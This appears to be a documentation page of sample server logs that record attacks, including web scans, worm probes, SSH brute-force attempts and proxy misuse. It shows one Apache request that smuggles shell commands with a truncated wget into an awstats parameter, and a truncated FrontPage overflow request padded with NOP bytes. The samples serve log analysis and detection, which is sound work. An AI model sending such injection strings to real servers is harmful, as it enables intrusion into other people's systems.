Samples of logs that contain information about attacks

Nessus scan entries in a web server log:

Nessus Scan in a web server log

Latest application scans:

Apache attack samples

Apache entry with command execution succeeded:

a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291

Apache scan (looking for vulnerable applications):

..code-block:: console

100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] “POST /blog/xmlrpc.php HTTP/1.0” 404 288

100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] “POST /blog/xmlsrv/xmlrpc.php HTTP/1.0” 404 295

100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] “POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0” 404 296

100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] “POST /drupal/xmlrpc.php HTTP/1.0” 404 290

Squid access log (worm scans):

524 192.168.2.204 TCP_MISS/404 590 GET http://www.ordendeslichts.de/intern/xxx3.php? - DIRECT/81.201.107.6 text/html

3571 192.168.2.204 TCP_MISS/404 470 GET http://www.levada.ru/htmlarea/images/xxx3.php? - DIRECT/62.118.252.213

1 192.168.2.204 TCP_NEGATIVE_HIT/404 487 GET http://ala-bg.net/444.php - NONE/- text/html

1 192.168.2.204 TCP_NEGATIVE_HIT/404 396 GET http://www.connectesl.com/444.php - NONE/- text/html

1 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html

0 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html

Squid proxy misuse – Attempt to proxy SMTP over the proxy:

0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html

2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html

0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html

0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html

8 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html

SSH bruteforce login:

Oct  2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194<br>
Oct  2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct  2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194<br>
Oct  2 01:13:20 host sshd[19620]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct  2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194<br>
Oct  2 01:13:22 host sshd[19622]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct  2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194<br>
Oct  2 01:13:23 host sshd[19624]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>

Attempt to exploit Frontpage with payload truncated:

74.74.126.250 - - [02/Aug/2007:15:53:46 -0400] "SEARCH /\x90................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
.....................................................................................\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271

74.74.126.250 - - [02/Aug/2007:15:54:17 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 406 288